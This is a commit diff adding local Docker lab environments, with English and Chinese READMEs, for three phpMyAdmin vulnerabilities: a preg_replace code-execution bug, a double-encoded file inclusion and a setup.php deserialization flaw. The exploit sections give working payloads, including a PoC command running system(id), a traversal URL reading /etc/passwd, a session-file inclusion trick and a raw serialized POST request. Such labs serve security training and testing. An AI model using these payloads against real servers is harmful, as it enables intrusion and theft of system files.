first commit

phpmyadmin/CVE-2016-5734/README.md

@@ -0,0 +1,37 @@
+# PhpMyAdmin 4.0.x—4.6.2 Remote Code Execution Vulnerability (CVE-2016-5734)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `preg_replace` function, because the information submitted by the user can be spliced into the first parameter.
+
+Before PHP 5.4.7, the first parameter of `preg_replace` could be truncated with `\0` and the change search pattern to `\e`. It can cause remote code execution vulnerability.
+
+Affected versions:
+
+- 4.0.x version before 4.0.10.16
+- 4.4.x version before 4.4.15.7
+- 4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced)
+
+## Setup
+
+Execute following commands to start PHP 5.3 + Apache + phpMyAdmin 4.4.15.6:
+
+```
+docker compose up -d 
+```
+
+After start, visit `http://your-ip:8080` and you will see the login page of phpMyAdmin. Log in with `root`:`root`.
+
+## Exploit
+
+This vulnerability requires login and the permission to write data.
+
+We use this POC(https://www.exploit-db.com/exploits/40185/) to reproduce the vulnerability.
+
+```
+./cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://your-ip:8080/
+```
+
+Result:
+
+![](1.png)

phpmyadmin/CVE-2016-5734/README.zh-cn.md

@@ -0,0 +1,35 @@
+# phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞（CVE-2016-5734）
+
+phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中，将用户输入的信息拼接进`preg_replace`函数第一个参数中。
+
+在PHP5.4.7以前，`preg_replace`的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。
+
+以下版本受到影响：
+
+- 4.0.10.16之前4.0.x版本
+- 4.4.15.7之前4.4.x版本
+- 4.6.3之前4.6.x版本（实际上由于该版本要求PHP5.5+，所以无法复现本漏洞）
+
+## 环境搭建
+
+运行如下命令启动PHP 5.3 + Apache + phpMyAdmin 4.4.15.6：
+
+```
+docker compose up -d 
+```
+
+启动后，访问`http://your-ip:8080`，即可看到phpMyAdmin的登录页面。使用`root`:`root`登录。
+
+## 漏洞复现
+
+这个功能需要登录，且能够写入数据。
+
+因为目标环境使用root，所以我们可以创建一个临时数据库和数据表，进行漏洞利用。这里，我们使用POC https://www.exploit-db.com/exploits/40185/ 来复现漏洞。
+
+```
+./cve-2016-5734.py -c 'system(id);' -u root -p root -d test http://your-ip:8080/
+```
+
+![](1.png)
+
+-d是已经可以写的数据库，-c是待执行的PHP语句，如果没有指定表名，这个POC会创建一个名为`prgpwn`的表。

phpmyadmin/CVE-2016-5734/config.inc.php

@@ -0,0 +1,29 @@
+<?php
+/*
+ * Generated configuration file
+ * Generated by: phpMyAdmin 4.6.2 setup script
+ * Date: Mon, 07 May 2018 10:48:03 +0000
+ */
+
+/* Servers configuration */
+$i = 0;
+
+/* Server: mysql [1] */
+$i++;
+$cfg['Servers'][$i]['verbose'] = 'mysql';
+$cfg['Servers'][$i]['host'] = 'mysql';
+$cfg['Servers'][$i]['port'] = 3306;
+$cfg['Servers'][$i]['socket'] = '';
+$cfg['Servers'][$i]['connect_type'] = 'tcp';
+$cfg['Servers'][$i]['auth_type'] = 'cookie';
+$cfg['Servers'][$i]['user'] = 'root';
+$cfg['Servers'][$i]['password'] = '';
+
+/* End of servers configuration */
+
+$cfg['blowfish_secret'] = '5af02eda401ae8.69737537';
+$cfg['DefaultLang'] = 'en';
+$cfg['ServerDefault'] = 1;
+$cfg['UploadDir'] = '';
+$cfg['SaveDir'] = '';
+?>

phpmyadmin/CVE-2016-5734/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2'
+services:
+ web:
+   image: vulhub/phpmyadmin:4.4.15.6
+   volumes:
+    - ./config.inc.php:/var/www/html/config.inc.php
+   ports:
+    - "8080:80"
+   depends_on:
+    - mysql
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=test

phpmyadmin/CVE-2018-12613/README.md

@@ -0,0 +1,30 @@
+# phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `index.php`, causing  files iclusion vulnerabilitiy.
+
+Reference links:
+
+- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
+- https://www.phpmyadmin.net/security/PMASA-2018-4/
+
+## Setup
+
+Run the following command to start phpmyadmin 4.8.1:
+
+```
+docker compose up -d
+```
+
+After the environment starts, visit `http://your-ip:8080`. The phpmyadmin is "config" mode, so we can login directly.
+
+## Exploit
+
+Visit `http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`, the result indicates that the file inclusion vulnerability exist:
+
+![](1.png)
+
+We can execute `SELECT '<?=phpinfo()?>';`, then check your sessionid (the value of phpMyAdmin in the cookie), and then include the session file:
+
+![](2.png)

phpmyadmin/CVE-2018-12613/README.zh-cn.md

@@ -0,0 +1,28 @@
+# phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）
+
+phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。
+
+参考文档：
+
+- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
+- https://www.phpmyadmin.net/security/PMASA-2018-4/
+
+## 漏洞环境
+
+执行如下命令，启动phpmyadmin 4.8.1：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`，即可进入phpmyadmin。配置的是“config”模式，所以无需输入密码，直接登录test账户。
+
+## 漏洞复现
+
+访问`http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`，可见`/etc/passwd`被读取，说明文件包含漏洞存在：
+
+![](1.png)
+
+利用方式也比较简单，可以执行一下`SELECT '<?=phpinfo()?>';`，然后查看自己的sessionid（cookie中phpMyAdmin的值），然后包含session文件即可：
+
+![](2.png)

phpmyadmin/CVE-2018-12613/config.inc.php

@@ -0,0 +1,28 @@
+<?php
+/*
+ * Generated configuration file
+ * Generated by: phpMyAdmin 4.6.2 setup script
+ * Date: Mon, 07 May 2018 10:48:03 +0000
+ */
+
+/* Servers configuration */
+$i = 0;
+
+/* Server: mysql [1] */
+$i++;
+$cfg['Servers'][$i]['verbose'] = 'mysql';
+$cfg['Servers'][$i]['host'] = 'mysql';
+$cfg['Servers'][$i]['port'] = 3306;
+$cfg['Servers'][$i]['socket'] = '';
+$cfg['Servers'][$i]['connect_type'] = 'tcp';
+$cfg['Servers'][$i]['auth_type'] = 'config';
+$cfg['Servers'][$i]['user'] = 'test';
+$cfg['Servers'][$i]['password'] = 'test';
+
+/* End of servers configuration */
+
+$cfg['blowfish_secret'] = '5af02eda401ae8.69737537';
+$cfg['DefaultLang'] = 'en';
+$cfg['ServerDefault'] = 1;
+$cfg['UploadDir'] = '';
+$cfg['SaveDir'] = '';

phpmyadmin/CVE-2018-12613/docker-compose.yml

@@ -0,0 +1,17 @@
+version: '2'
+services:
+ web:
+   image: vulhub/phpmyadmin:4.8.1
+   volumes:
+    - ./config.inc.php:/var/www/html/config.inc.php
+   ports:
+    - "8080:80"
+   depends_on:
+    - mysql
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_RANDOM_ROOT_PASSWORD=yes
+    - MYSQL_DATABASE=test
+    - MYSQL_USER=test
+    - MYSQL_PASSWORD=test

phpmyadmin/WooYun-2016-199433/README.md

@@ -0,0 +1,35 @@
+# Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Affected version: 2.x
+
+## Setup
+
+Run the following command to start phpmyadmin:
+
+```
+docker compose up -d
+```
+
+Visit `http://your-ip:8080` and you will see the phpmyadmin home page. Because there is no connection to the database, we will get an error. But this vulnerability is not related to the database, so just ignore.
+
+## Exploit
+
+Send the following package to read `/etc/passwd`:
+
+```
+POST /scripts/setup.php HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 80
+
+action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+```
+
+![](1.png)

phpmyadmin/WooYun-2016-199433/README.zh-cn.md

@@ -0,0 +1,33 @@
+# phpmyadmin scripts/setup.php 反序列化漏洞（WooYun-2016-199433）
+
+phpmyadmin 2.x版本中存在一处反序列化漏洞，通过该漏洞，攻击者可以读取任意文件或执行任意代码。
+
+## 环境搭建
+
+执行如下命令启动phpmyadmin：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`，即可看到phpmyadmin的首页。因为没有连接数据库，所以此时会报错，但我们这个漏洞的利用与数据库无关，所以忽略。
+
+## 漏洞复现
+
+发送如下数据包，即可读取`/etc/passwd`：
+
+```
+POST /scripts/setup.php HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 80
+
+action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+```
+
+![](1.png)

phpmyadmin/WooYun-2016-199433/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/phpmyadmin:2.8.0.4
+   ports:
+    - "8080:80"